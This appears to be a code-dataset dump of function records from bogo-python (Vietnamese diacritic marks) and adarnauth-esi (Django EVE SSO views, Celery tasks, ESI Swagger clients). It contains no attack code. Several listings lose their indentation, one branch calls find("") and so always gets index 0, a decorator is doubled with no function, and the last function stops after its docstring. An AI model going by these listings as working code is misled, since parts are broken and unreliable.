    target = mark_trans[0]
    bar_applicable = (target == 'd' and components[0]
                      and components[0][-1].lower() in ("d", "đ"))
    if bar_applicable:
        return True
    vowel = components[1]
    if vowel != "" and target in strip(vowel).lower():
        return True
    return False
def remove_mark_char(char):
    """Remove mark from a single character, if any."""
    # Delegates to add_mark_char: applying Mark.NONE maps each marked
    # letter back to its bare family base (e.g. â/ă -> a, đ -> d).
    return add_mark_char(char, Mark.NONE)
def remove_mark_string(string):
    """Return ``string`` with all marks removed; accents are preserved."""
    return utils.join([remove_mark_char(c) for c in string])
def strip(string):
    """
    Strip a string of all marks and accents.
    """
    # Remove accents first, then marks.
    return remove_mark_string(accent.remove_accent_string(string))
|
BoGoEngine/bogo-python | bogo/mark.py | is_valid_mark | python | def is_valid_mark(comps, mark_trans):
if mark_trans == "*_":
return True
components = list(comps)
if mark_trans[0] == 'd' and components[0] \
and components[0][-1].lower() in ("d", "đ"):
return True
elif components[1] != "" and \
strip(components[1]).lower().find(mark_trans[0]) != -1:
return True
else:
return False | Check whether the mark given by mark_trans is valid to add to the components | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/mark.py#L155-L170 | [
"def strip(string):\n \"\"\"\n Strip a string of all marks and accents.\n \"\"\"\n return remove_mark_string(accent.remove_accent_string(string))\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with marks, which are diacritical markings
to change the base sound of a character but not its tonal quality.
E.g. the hat mark in â.
"""
from __future__ import unicode_literals
from bogo import accent, utils
Accent = accent.Accent
class Mark:
HAT = 4
HORN = 3
BREVE = 2
BAR = 1
NONE = 0
FAMILY_A = "aăâ"
FAMILY_E = "eê"
FAMILY_O = "oơô"
FAMILY_U = "uư"
FAMILY_D = "dđ"
def get_mark_char(char):
"""
Get the mark of a single char, if any.
"""
char = accent.remove_accent_char(char.lower())
if char == "":
return Mark.NONE
if char == "đ":
return Mark.BAR
if char in "ă":
return Mark.BREVE
if char in "ơư":
return Mark.HORN
if char in "âêô":
return Mark.HAT
return Mark.NONE
# TODO: Monstrous code. Needs refactoring.
def add_mark(components, mark):
comp = list(components)
if mark == Mark.BAR and comp[0] and comp[0][-1].lower() in FAMILY_D:
comp[0] = add_mark_at(comp[0], len(comp[0])-1, Mark.BAR)
else:
#remove all marks and accents in vowel part
raw_vowel = accent.add_accent(comp, Accent.NONE)[1].lower()
raw_vowel = utils.join([add_mark_char(c, Mark.NONE) for c in raw_vowel])
if mark == Mark.HAT:
pos = max(raw_vowel.find("a"), raw_vowel.find("o"),
raw_vowel.find("e"))
comp[1] = add_mark_at(comp[1], pos, Mark.HAT)
elif mark == Mark.BREVE:
if raw_vowel != "ua":
comp[1] = add_mark_at(comp[1], raw_vowel.find("a"), Mark.BREVE)
elif mark == Mark.HORN:
if raw_vowel in ("uo", "uoi", "uou"):
comp[1] = utils.join([add_mark_char(c, Mark.HORN) for c in comp[1][:2]]) + comp[1][2:]
elif raw_vowel == "oa":
comp[1] = add_mark_at(comp[1], 1, Mark.HORN)
else:
pos = max(raw_vowel.find(""), raw_vowel.find("o"))
comp[1] = add_mark_at(comp[1], pos, Mark.HORN)
if mark == Mark.NONE:
if not raw_vowel == comp[1].lower():
comp[1] = raw_vowel
elif comp[0] and comp[0][-1] == "đ":
comp[0] = comp[0][:-1] + "d"
return comp
def add_mark_at(string, index, mark):
"""
Add mark to the index-th character of the given string. Return the new string after applying change.
Notice: index > 0
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + add_mark_char(string[index], mark) + string[index+1:]
def add_mark_char(char, mark):
    """
    Return ``char`` with ``mark`` applied, keeping its accent and case.

    Letters outside the families affected by ``mark`` are returned
    unchanged.
    """
    if char == "":
        return ""
    is_upper = char.isupper()
    original_accent = accent.get_accent_char(char)
    base = accent.add_accent_char(char.lower(), Accent.NONE)
    # For each mark: the letter families it affects and the resulting letter.
    substitutions = {
        Mark.HAT: ((FAMILY_A, "â"), (FAMILY_O, "ô"), (FAMILY_E, "ê")),
        Mark.HORN: ((FAMILY_O, "ơ"), (FAMILY_U, "ư")),
        Mark.BREVE: ((FAMILY_A, "ă"),),
        Mark.BAR: ((FAMILY_D, "đ"),),
        Mark.NONE: ((FAMILY_A, "a"), (FAMILY_E, "e"), (FAMILY_O, "o"),
                    (FAMILY_U, "u"), (FAMILY_D, "d")),
    }
    result = base
    for family, replacement in substitutions.get(mark, ()):
        if base in family:
            result = replacement
            break
    # Re-apply the original accent and restore the original case.
    result = accent.add_accent_char(result, original_accent)
    return utils.change_case(result, is_upper)
def remove_mark_char(char):
"""Remove mark from a single character, if any."""
return add_mark_char(char, Mark.NONE)
def remove_mark_string(string):
return utils.join([remove_mark_char(c) for c in string])
def strip(string):
"""
Strip a string of all marks and accents.
"""
return remove_mark_string(accent.remove_accent_string(string))
|
Adarnof/adarnauth-esi | esi/views.py | sso_redirect | python | def sso_redirect(request, scopes=list([]), return_to=None):
logger.debug("Initiating redirect of {0} session {1}".format(request.user, request.session.session_key[:5]))
if isinstance(scopes, string_types):
scopes = list([scopes])
# ensure only one callback redirect model per session
CallbackRedirect.objects.filter(session_key=request.session.session_key).delete()
# ensure session installed in database
if not request.session.exists(request.session.session_key):
logger.debug("Creating new session before redirect.")
request.session.create()
if return_to:
url = reverse(return_to)
else:
url = request.get_full_path()
oauth = OAuth2Session(app_settings.ESI_SSO_CLIENT_ID, redirect_uri=app_settings.ESI_SSO_CALLBACK_URL, scope=scopes)
redirect_url, state = oauth.authorization_url(app_settings.ESI_OAUTH_LOGIN_URL)
CallbackRedirect.objects.create(session_key=request.session.session_key, state=state, url=url)
logger.debug("Redirecting {0} session {1} to SSO. Callback will be redirected to {2}".format(request.user, request.session.session_key[:5], url))
return redirect(redirect_url) | Generates a :model:`esi.CallbackRedirect` for the specified request.
Redirects to EVE for login.
Accepts a view or URL name as a redirect after SSO. | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/views.py#L16-L44 | null | from __future__ import unicode_literals
from django.shortcuts import redirect, get_object_or_404, render
from django.utils.six import string_types
from django.urls import reverse
from esi.models import CallbackRedirect, Token
from esi import app_settings
from esi.decorators import tokens_required
from django.http.response import HttpResponseBadRequest
from requests_oauthlib import OAuth2Session
import logging
logger = logging.getLogger(__name__)
def receive_callback(request):
    """
    Parse the SSO callback, validate its parameters, create the
    :model:`esi.Token`, and redirect internally to the target url stored
    on the matching :model:`esi.CallbackRedirect`.
    """
    logger.debug("Received callback for {0} session {1}".format(request.user, request.session.session_key[:5]))
    # make sure request has required parameters
    code = request.GET.get('code', None)
    state = request.GET.get('state', None)
    # Validate explicitly instead of with `assert`: assertions are stripped
    # when Python runs with -O, which would let malformed callbacks through.
    if not code or not state:
        logger.debug("Missing parameters for code exchange.")
        return HttpResponseBadRequest()
    callback = get_object_or_404(CallbackRedirect, state=state, session_key=request.session.session_key)
    token = Token.objects.create_from_request(request)
    callback.token = token
    callback.save()
    logger.debug(
        "Processed callback for {0} session {1}. Redirecting to {2}".format(request.user, request.session.session_key[:5], callback.url))
    return redirect(callback.url)
def select_token(request, scopes='', new=False):
    """
    Presents the user with a selection of applicable tokens for the requested view.
    """
    # tokens_required injects the matching tokens as the `tokens` argument;
    # `new=True` forces a fresh SSO round-trip instead of reusing tokens.
    @tokens_required(scopes=scopes, new=new)
    def _token_list(r, tokens):
        # ESI_BASE_TEMPLATE lets the host project theme the page.
        context = {
            'tokens': tokens,
            'base_template': app_settings.ESI_BASE_TEMPLATE,
        }
        return render(r, 'esi/select_token.html', context=context)
    return _token_list(request)
|
Adarnof/adarnauth-esi | esi/views.py | receive_callback | python | def receive_callback(request):
logger.debug("Received callback for {0} session {1}".format(request.user, request.session.session_key[:5]))
# make sure request has required parameters
code = request.GET.get('code', None)
state = request.GET.get('state', None)
try:
assert code
assert state
except AssertionError:
logger.debug("Missing parameters for code exchange.")
return HttpResponseBadRequest()
callback = get_object_or_404(CallbackRedirect, state=state, session_key=request.session.session_key)
token = Token.objects.create_from_request(request)
callback.token = token
callback.save()
logger.debug(
"Processed callback for {0} session {1}. Redirecting to {2}".format(request.user, request.session.session_key[:5], callback.url))
return redirect(callback.url) | Parses SSO callback, validates, retrieves :model:`esi.Token`, and internally redirects to the target url. | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/views.py#L47-L68 | null | from __future__ import unicode_literals
from django.shortcuts import redirect, get_object_or_404, render
from django.utils.six import string_types
from django.urls import reverse
from esi.models import CallbackRedirect, Token
from esi import app_settings
from esi.decorators import tokens_required
from django.http.response import HttpResponseBadRequest
from requests_oauthlib import OAuth2Session
import logging
logger = logging.getLogger(__name__)
def sso_redirect(request, scopes=None, return_to=None):
    """
    Generates a :model:`esi.CallbackRedirect` for the specified request.
    Redirects to EVE for login.
    Accepts a view or URL name as a redirect after SSO.

    :param scopes: ESI scope name or list of scope names to request.
    :param return_to: View/URL name to resolve and return to after SSO;
        defaults to the current request path.
    """
    logger.debug("Initiating redirect of {0} session {1}".format(request.user, request.session.session_key[:5]))
    # Normalise here instead of using a shared mutable `[]` default argument.
    if scopes is None:
        scopes = []
    elif isinstance(scopes, string_types):
        scopes = [scopes]
    # ensure only one callback redirect model per session
    CallbackRedirect.objects.filter(session_key=request.session.session_key).delete()
    # ensure session installed in database
    if not request.session.exists(request.session.session_key):
        logger.debug("Creating new session before redirect.")
        request.session.create()
    if return_to:
        url = reverse(return_to)
    else:
        url = request.get_full_path()
    oauth = OAuth2Session(app_settings.ESI_SSO_CLIENT_ID, redirect_uri=app_settings.ESI_SSO_CALLBACK_URL, scope=scopes)
    redirect_url, state = oauth.authorization_url(app_settings.ESI_OAUTH_LOGIN_URL)
    CallbackRedirect.objects.create(session_key=request.session.session_key, state=state, url=url)
    logger.debug("Redirecting {0} session {1} to SSO. Callback will be redirected to {2}".format(request.user, request.session.session_key[:5], url))
    return redirect(redirect_url)
def select_token(request, scopes='', new=False):
"""
Presents the user with a selection of applicable tokens for the requested view.
"""
@tokens_required(scopes=scopes, new=new)
def _token_list(r, tokens):
context = {
'tokens': tokens,
'base_template': app_settings.ESI_BASE_TEMPLATE,
}
return render(r, 'esi/select_token.html', context=context)
return _token_list(request)
|
Adarnof/adarnauth-esi | esi/views.py | select_token | python | def select_token(request, scopes='', new=False):
@tokens_required(scopes=scopes, new=new)
def _token_list(r, tokens):
context = {
'tokens': tokens,
'base_template': app_settings.ESI_BASE_TEMPLATE,
}
return render(r, 'esi/select_token.html', context=context)
return _token_list(request) | Presents the user with a selection of applicable tokens for the requested view. | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/views.py#L71-L84 | [
"def tokens_required(scopes='', new=False):\n \"\"\"\n Decorator for views to request an ESI Token.\n Accepts required scopes as a space-delimited string\n or list of strings of scope names.\n Can require a new token to be retrieved by SSO.\n Returns a QueryDict of Tokens.\n \"\"\"\n\n def d... | from __future__ import unicode_literals
from django.shortcuts import redirect, get_object_or_404, render
from django.utils.six import string_types
from django.urls import reverse
from esi.models import CallbackRedirect, Token
from esi import app_settings
from esi.decorators import tokens_required
from django.http.response import HttpResponseBadRequest
from requests_oauthlib import OAuth2Session
import logging
logger = logging.getLogger(__name__)
def sso_redirect(request, scopes=list([]), return_to=None):
"""
Generates a :model:`esi.CallbackRedirect` for the specified request.
Redirects to EVE for login.
Accepts a view or URL name as a redirect after SSO.
"""
logger.debug("Initiating redirect of {0} session {1}".format(request.user, request.session.session_key[:5]))
if isinstance(scopes, string_types):
scopes = list([scopes])
# ensure only one callback redirect model per session
CallbackRedirect.objects.filter(session_key=request.session.session_key).delete()
# ensure session installed in database
if not request.session.exists(request.session.session_key):
logger.debug("Creating new session before redirect.")
request.session.create()
if return_to:
url = reverse(return_to)
else:
url = request.get_full_path()
oauth = OAuth2Session(app_settings.ESI_SSO_CLIENT_ID, redirect_uri=app_settings.ESI_SSO_CALLBACK_URL, scope=scopes)
redirect_url, state = oauth.authorization_url(app_settings.ESI_OAUTH_LOGIN_URL)
CallbackRedirect.objects.create(session_key=request.session.session_key, state=state, url=url)
logger.debug("Redirecting {0} session {1} to SSO. Callback will be redirected to {2}".format(request.user, request.session.session_key[:5], url))
return redirect(redirect_url)
def receive_callback(request):
"""
Parses SSO callback, validates, retrieves :model:`esi.Token`, and internally redirects to the target url.
"""
logger.debug("Received callback for {0} session {1}".format(request.user, request.session.session_key[:5]))
# make sure request has required parameters
code = request.GET.get('code', None)
state = request.GET.get('state', None)
try:
assert code
assert state
except AssertionError:
logger.debug("Missing parameters for code exchange.")
return HttpResponseBadRequest()
callback = get_object_or_404(CallbackRedirect, state=state, session_key=request.session.session_key)
token = Token.objects.create_from_request(request)
callback.token = token
callback.save()
logger.debug(
"Processed callback for {0} session {1}. Redirecting to {2}".format(request.user, request.session.session_key[:5], callback.url))
return redirect(callback.url)
|
Adarnof/adarnauth-esi | esi/tasks.py | cleanup_callbackredirect | python | def cleanup_callbackredirect(max_age=300):
max_age = timezone.now() - timedelta(seconds=max_age)
logger.debug("Deleting all callback redirects created before {0}".format(max_age.strftime("%b %d %Y %H:%M:%S")))
CallbackRedirect.objects.filter(created__lte=max_age).delete() | Delete old :model:`esi.CallbackRedirect` models.
Accepts a max_age parameter, in seconds (default 300). | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/tasks.py#L13-L20 | null | from __future__ import unicode_literals
from django.utils import timezone
from datetime import timedelta
from esi.models import CallbackRedirect, Token
from celery import shared_task
import logging
logger = logging.getLogger(__name__)
@shared_task
@shared_task
def cleanup_token():
    """
    Delete expired :model:`esi.Token` models.
    """
    logger.debug("Triggering bulk refresh of all expired tokens.")
    # NOTE(review): the docstring says "delete" but the call refreshes;
    # presumably bulk_refresh discards tokens that cannot be refreshed --
    # confirm against the Token manager implementation.
    Token.objects.all().get_expired().bulk_refresh()
|
Adarnof/adarnauth-esi | esi/clients.py | cache_spec | python | def cache_spec(name, spec):
return cache.set(build_cache_name(name), spec, app_settings.ESI_SPEC_CACHE_DURATION) | Cache the spec dict
:param name: Version name
:param spec: Spec dict
:return: True if cached | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/clients.py#L123-L130 | [
"def build_cache_name(name):\n \"\"\"\n Cache key name formatter\n :param name: Name of the spec dict to cache, usually version\n :return: String name for cache key\n :rtype: str\n \"\"\"\n return 'esi_swaggerspec_%s' % name\n"
] | from __future__ import unicode_literals
from bravado.client import SwaggerClient, CONFIG_DEFAULTS
from bravado import requests_client
from bravado.swagger_model import Loader
from bravado.http_future import HttpFuture
from bravado_core.spec import Spec
from esi.errors import TokenExpiredError
from esi import app_settings
from django.core.cache import cache
from datetime import datetime
from hashlib import md5
import json
try:
import urlparse
except ImportError: # py3
from urllib import parse as urlparse
SPEC_CONFIG = {'use_models': False}
class CachingHttpFuture(HttpFuture):
    """
    Used to add caching to certain HTTP requests according to "Expires" header
    """

    def __init__(self, *args, **kwargs):
        super(CachingHttpFuture, self).__init__(*args, **kwargs)
        self.cache_key = self._build_cache_key(self.future.request)

    @staticmethod
    def _build_cache_key(request):
        """
        Generate the key name used to cache responses.

        :param request: request used to retrieve API response
        :return: formatted cache name
        """
        str_hash = md5(
            (request.method + request.url + str(request.params) + str(request.data) + str(request.json)).encode(
                'utf-8')).hexdigest()
        return 'esi_%s' % str_hash

    @staticmethod
    def _time_to_expiry(expires):
        """
        Determine the seconds until a HTTP header "Expires" timestamp.

        :param expires: HTTP response "Expires" header value
        :return: seconds until the "Expires" time, never negative
        """
        try:
            expires_dt = datetime.strptime(str(expires), '%a, %d %b %Y %H:%M:%S %Z')
            delta = expires_dt - datetime.utcnow()
            # timedelta.seconds discards the day component and is always
            # non-negative, so a past "Expires" reported a positive value
            # (caching stale data) and far-future headers were truncated.
            # total_seconds() gives the true duration; clamp to zero so
            # callers can simply test `> 0`.
            return max(int(delta.total_seconds()), 0)
        except ValueError:
            # Unparseable header: treat as already expired (no caching).
            return 0

    def result(self, **kwargs):
        if app_settings.ESI_CACHE_RESPONSE and self.future.request.method == 'GET' and self.operation is not None:
            """
            Only cache if all are true:
            - settings dictate caching
            - it's a http get request
            - it's to a swagger api endpoint
            """
            cached = cache.get(self.cache_key)
            if cached:
                result, response = cached
            else:
                _also_return_response = self.also_return_response  # preserve original value
                self.also_return_response = True  # override to always get the raw response for expiry header
                result, response = super(CachingHttpFuture, self).result(**kwargs)
                self.also_return_response = _also_return_response  # restore original value

                if 'Expires' in response.headers:
                    expires = self._time_to_expiry(response.headers['Expires'])
                    if expires > 0:
                        cache.set(self.cache_key, (result, response), expires)

            if self.also_return_response:
                return result, response
            else:
                return result
        else:
            return super(CachingHttpFuture, self).result(**kwargs)
requests_client.HttpFuture = CachingHttpFuture
class TokenAuthenticator(requests_client.Authenticator):
    """
    Adds the authorization header containing access token, if specified.
    Sets ESI datasource to tranquility or singularity.
    """

    def __init__(self, token=None, datasource=None):
        # Authenticate for the ESI host only, not every outgoing request.
        host = urlparse.urlsplit(app_settings.ESI_API_URL).hostname
        super(TokenAuthenticator, self).__init__(host)
        self.token = token  # token providing access_token, or None
        self.datasource = datasource  # datasource name, or None for the default

    def apply(self, request):
        """
        Attach the bearer token (refreshing it first if expired and
        refreshable) and the datasource parameter to an outgoing request.

        :raises TokenExpiredError: if the token is expired and cannot be refreshed.
        """
        if self.token and self.token.expired:
            if self.token.can_refresh:
                self.token.refresh()
            else:
                raise TokenExpiredError()
        # The conditional covers the whole expression: the header is set to
        # None when no token was supplied.
        request.headers['Authorization'] = 'Bearer ' + self.token.access_token if self.token else None
        request.params['datasource'] = self.datasource or app_settings.ESI_API_DATASOURCE
        return request
def build_cache_name(name):
    """
    Build the cache key under which a swagger spec is stored.

    :param name: name of the spec dict to cache, usually a version string
    :return: cache key
    :rtype: str
    """
    return 'esi_swaggerspec_{0}'.format(name)
def build_spec_url(spec_version):
    """
    Build the URL of swagger.json for the given ESI version.

    :param spec_version: name of the swagger spec version, e.g. 'latest' or 'v4'
    :return: URL of swagger.json for the requested spec version
    """
    spec_path = spec_version + '/swagger.json'
    return urlparse.urljoin(app_settings.ESI_API_URL, spec_path)
def get_spec(name, http_client=None, config=None):
    """
    :param name: Name of the revision of spec, eg latest or v4
    :param http_client: Requests client used for retrieving specs
    :param config: Spec configuration - see Spec.CONFIG_DEFAULTS
    :return: :class:`bravado_core.spec.Spec`
    """
    http_client = http_client or requests_client.RequestsClient()

    def load_spec():
        # Only invoked on a cache miss (see get_or_set below).
        loader = Loader(http_client)
        return loader.load_spec(build_spec_url(name))

    # Spec dicts are cached so swagger.json is not re-downloaded each call.
    spec_dict = cache.get_or_set(build_cache_name(name), load_spec, app_settings.ESI_SPEC_CACHE_DURATION)
    # Caller-supplied config entries override the bravado defaults.
    config = dict(CONFIG_DEFAULTS, **(config or {}))
    return Spec.from_dict(spec_dict, build_spec_url(name), http_client, config)
def build_spec(base_version, http_client=None, **kwargs):
    """
    Generates the Spec used to initialize a SwaggerClient, supporting mixed resource versions
    :param http_client: :class:`bravado.requests_client.RequestsClient`
    :param base_version: Version to base the spec on. Any resource without an explicit version will be this.
    :param kwargs: Explicit resource versions, by name (eg Character='v4')
    :return: :class:`bravado_core.spec.Spec`
    :raises AttributeError: if a requested resource is missing from its explicit API revision
    """
    base_spec = get_spec(base_version, http_client=http_client, config=SPEC_CONFIG)
    if kwargs:
        for resource, resource_version in kwargs.items():
            versioned_spec = get_spec(resource_version, http_client=http_client, config=SPEC_CONFIG)
            try:
                # Resource names in the spec are capitalized (eg 'Character').
                spec_resource = versioned_spec.resources[resource.capitalize()]
            except KeyError:
                raise AttributeError(
                    'Resource {0} not found on API revision {1}'.format(resource, resource_version))
            # Override the base version's resource with the pinned revision.
            base_spec.resources[resource.capitalize()] = spec_resource
    return base_spec
def read_spec(path, http_client=None):
    """
    Read a local swagger spec file and build a client from it.

    :param path: String path to local swagger spec file.
    :param http_client: :class:`bravado.requests_client.RequestsClient`
    :return: :class:`bravado.client.SwaggerClient`
    """
    # json.load reads straight from the file object; note the previous
    # docstring wrongly documented a Spec return -- SwaggerClient.from_spec
    # returns a client.
    with open(path, 'r') as f:
        spec_dict = json.load(f)

    return SwaggerClient.from_spec(spec_dict, http_client=http_client, config=SPEC_CONFIG)
def esi_client_factory(token=None, datasource=None, spec_file=None, version=None, **kwargs):
    """
    Generates an ESI client.
    :param token: :class:`esi.Token` used to access authenticated endpoints.
    :param datasource: Name of the ESI datasource to access.
    :param spec_file: Absolute path to a swagger spec file to load.
    :param version: Base ESI API version. Accepted values are 'legacy', 'latest', 'dev', or 'vX' where X is a number.
    :param kwargs: Explicit resource versions to build, in the form Character='v4'. Same values accepted as version.
    :return: :class:`bravado.client.SwaggerClient`
    If a spec_file is specified, specific versioning is not available. Meaning the version and resource version kwargs
    are ignored in favour of the versions available in the spec_file.
    """
    client = requests_client.RequestsClient()
    if token or datasource:
        # Only install an authenticator when there is something to apply.
        client.authenticator = TokenAuthenticator(token=token, datasource=datasource)
    api_version = version or app_settings.ESI_API_VERSION
    if spec_file:
        # A local spec file wins; version/resource kwargs are ignored here.
        return read_spec(spec_file, http_client=client)
    else:
        spec = build_spec(api_version, http_client=client, **kwargs)
        return SwaggerClient(spec)
def minimize_spec(spec_dict, operations=None, resources=None):
    """
    Trim a source spec dict down to only the indicated operations/resources.

    :param spec_dict: The source spec dict to minimize.
    :type spec_dict: dict
    :param operations: A list of operation IDs to retain.
    :type operations: list of str
    :param resources: A list of resource names (tags) to retain.
    :type resources: list of str
    :return: Minimized swagger spec dict
    :rtype: dict
    """
    wanted_operations = operations or []
    wanted_resources = resources or []
    # Copy everything except 'paths', which is rebuilt selectively below.
    minimized = {key: value for key, value in spec_dict.items() if key != 'paths'}
    minimized['paths'] = {}
    for path_name, path in spec_dict['paths'].items():
        for method, data in path.items():
            keep = (data['operationId'] in wanted_operations
                    or any(tag in wanted_resources for tag in data['tags']))
            if keep:
                minimized['paths'].setdefault(path_name, {})[method] = data
    return minimized
|
Adarnof/adarnauth-esi | esi/clients.py | get_spec | python | def get_spec(name, http_client=None, config=None):
http_client = http_client or requests_client.RequestsClient()
def load_spec():
loader = Loader(http_client)
return loader.load_spec(build_spec_url(name))
spec_dict = cache.get_or_set(build_cache_name(name), load_spec, app_settings.ESI_SPEC_CACHE_DURATION)
config = dict(CONFIG_DEFAULTS, **(config or {}))
return Spec.from_dict(spec_dict, build_spec_url(name), http_client, config) | :param name: Name of the revision of spec, eg latest or v4
:param http_client: Requests client used for retrieving specs
:param config: Spec configuration - see Spec.CONFIG_DEFAULTS
:return: :class:`bravado_core.spec.Spec` | train | https://github.com/Adarnof/adarnauth-esi/blob/f6618a31efbfeedeb96316ab9b82ecadda776ac1/esi/clients.py#L142-L157 | [
"def build_cache_name(name):\n \"\"\"\n Cache key name formatter\n :param name: Name of the spec dict to cache, usually version\n :return: String name for cache key\n :rtype: str\n \"\"\"\n return 'esi_swaggerspec_%s' % name\n",
"def build_spec_url(spec_version):\n \"\"\"\n Generates th... | from __future__ import unicode_literals
from bravado.client import SwaggerClient, CONFIG_DEFAULTS
from bravado import requests_client
from bravado.swagger_model import Loader
from bravado.http_future import HttpFuture
from bravado_core.spec import Spec
from esi.errors import TokenExpiredError
from esi import app_settings
from django.core.cache import cache
from datetime import datetime
from hashlib import md5
import json
try:
import urlparse
except ImportError: # py3
from urllib import parse as urlparse
SPEC_CONFIG = {'use_models': False}
class CachingHttpFuture(HttpFuture):
"""
Used to add caching to certain HTTP requests according to "Expires" header
"""
def __init__(self, *args, **kwargs):
super(CachingHttpFuture, self).__init__(*args, **kwargs)
self.cache_key = self._build_cache_key(self.future.request)
@staticmethod
def _build_cache_key(request):
"""
Generated the key name used to cache responses
:param request: request used to retrieve API response
:return: formatted cache name
"""
str_hash = md5(
(request.method + request.url + str(request.params) + str(request.data) + str(request.json)).encode(
'utf-8')).hexdigest()
return 'esi_%s' % str_hash
@staticmethod
def _time_to_expiry(expires):
"""
Determines the seconds until a HTTP header "Expires" timestamp
:param expires: HTTP response "Expires" header
:return: seconds until "Expires" time
"""
try:
expires_dt = datetime.strptime(str(expires), '%a, %d %b %Y %H:%M:%S %Z')
delta = expires_dt - datetime.utcnow()
return delta.seconds
except ValueError:
return 0
def result(self, **kwargs):
if app_settings.ESI_CACHE_RESPONSE and self.future.request.method == 'GET' and self.operation is not None:
"""
Only cache if all are true:
- settings dictate caching
- it's a http get request
- it's to a swagger api endpoint
"""
cached = cache.get(self.cache_key)
if cached:
result, response = cached
else:
_also_return_response = self.also_return_response # preserve original value
self.also_return_response = True # override to always get the raw response for expiry header
result, response = super(CachingHttpFuture, self).result(**kwargs)
self.also_return_response = _also_return_response # restore original value
if 'Expires' in response.headers:
expires = self._time_to_expiry(response.headers['Expires'])
if expires > 0:
cache.set(self.cache_key, (result, response), expires)
if self.also_return_response:
return result, response
else:
return result
else:
return super(CachingHttpFuture, self).result(**kwargs)
requests_client.HttpFuture = CachingHttpFuture
class TokenAuthenticator(requests_client.Authenticator):
"""
Adds the authorization header containing access token, if specified.
Sets ESI datasource to tranquility or singularity.
"""
def __init__(self, token=None, datasource=None):
host = urlparse.urlsplit(app_settings.ESI_API_URL).hostname
super(TokenAuthenticator, self).__init__(host)
self.token = token
self.datasource = datasource
def apply(self, request):
if self.token and self.token.expired:
if self.token.can_refresh:
self.token.refresh()
else:
raise TokenExpiredError()
request.headers['Authorization'] = 'Bearer ' + self.token.access_token if self.token else None
request.params['datasource'] = self.datasource or app_settings.ESI_API_DATASOURCE
return request
def build_cache_name(name):
"""
Cache key name formatter
:param name: Name of the spec dict to cache, usually version
:return: String name for cache key
:rtype: str
"""
return 'esi_swaggerspec_%s' % name
def cache_spec(name, spec):
    """
    Store a swagger spec dict in the cache.

    :param name: version name used to build the cache key
    :param spec: spec dict to cache
    :return: True if cached
    """
    cache_key = build_cache_name(name)
    return cache.set(cache_key, spec, app_settings.ESI_SPEC_CACHE_DURATION)
def build_spec_url(spec_version):
"""
Generates the URL to swagger.json for the ESI version
:param spec_version: Name of the swagger spec version, like latest or v4
:return: URL to swagger.json for the requested spec version
"""
return urlparse.urljoin(app_settings.ESI_API_URL, spec_version + '/swagger.json')
def build_spec(base_version, http_client=None, **kwargs):
    """
    Generates the Spec used to initialize a SwaggerClient, supporting mixed resource versions
    :param http_client: :class:`bravado.requests_client.RequestsClient`
    :param base_version: Version to base the spec on. Any resource without an explicit version will be this.
    :param kwargs: Explicit resource versions, by name (eg Character='v4')
    :return: :class:`bravado_core.spec.Spec`
    :raises AttributeError: when a named resource is absent from the requested revision
    """
    spec = get_spec(base_version, http_client=http_client, config=SPEC_CONFIG)
    # Overlay each explicitly-versioned resource on top of the base spec.
    for resource, resource_version in kwargs.items():
        versioned = get_spec(resource_version, http_client=http_client, config=SPEC_CONFIG)
        key = resource.capitalize()
        try:
            spec.resources[key] = versioned.resources[key]
        except KeyError:
            raise AttributeError(
                'Resource {0} not found on API revision {1}'.format(resource, resource_version))
    return spec
def read_spec(path, http_client=None):
    """
    Reads in a swagger spec file used to initialize a SwaggerClient
    :param path: String path to local swagger spec file.
    :param http_client: :class:`bravado.requests_client.RequestsClient`
    :return: :class:`bravado_core.spec.Spec`
    :raises ValueError: when the file is not valid JSON
    """
    with open(path, 'r') as f:
        # json.load streams from the file object directly instead of
        # materializing the whole file as a string first (json.loads(f.read())).
        spec_dict = json.load(f)
    return SwaggerClient.from_spec(spec_dict, http_client=http_client, config=SPEC_CONFIG)
def esi_client_factory(token=None, datasource=None, spec_file=None, version=None, **kwargs):
    """
    Generates an ESI client.
    :param token: :class:`esi.Token` used to access authenticated endpoints.
    :param datasource: Name of the ESI datasource to access.
    :param spec_file: Absolute path to a swagger spec file to load.
    :param version: Base ESI API version. Accepted values are 'legacy', 'latest', 'dev', or 'vX' where X is a number.
    :param kwargs: Explicit resource versions to build, in the form Character='v4'. Same values accepted as version.
    :return: :class:`bravado.client.SwaggerClient`
    If a spec_file is specified, specific versioning is not available. Meaning the version and resource version kwargs
    are ignored in favour of the versions available in the spec_file.
    """
    http_client = requests_client.RequestsClient()
    # Only attach an authenticator when there is something for it to do.
    if token or datasource:
        http_client.authenticator = TokenAuthenticator(token=token, datasource=datasource)

    # A local spec file short-circuits version resolution entirely.
    if spec_file:
        return read_spec(spec_file, http_client=http_client)

    base_version = version or app_settings.ESI_API_VERSION
    spec = build_spec(base_version, http_client=http_client, **kwargs)
    return SwaggerClient(spec)
def minimize_spec(spec_dict, operations=None, resources=None):
    """
    Trims down a source spec dict to only the operations or resources indicated.
    :param spec_dict: The source spec dict to minimize.
    :type spec_dict: dict
    :param operations: A list of opertion IDs to retain.
    :type operations: list of str
    :param resources: A list of resource names to retain.
    :type resources: list of str
    :return: Minimized swagger spec dict
    :rtype: dict
    """
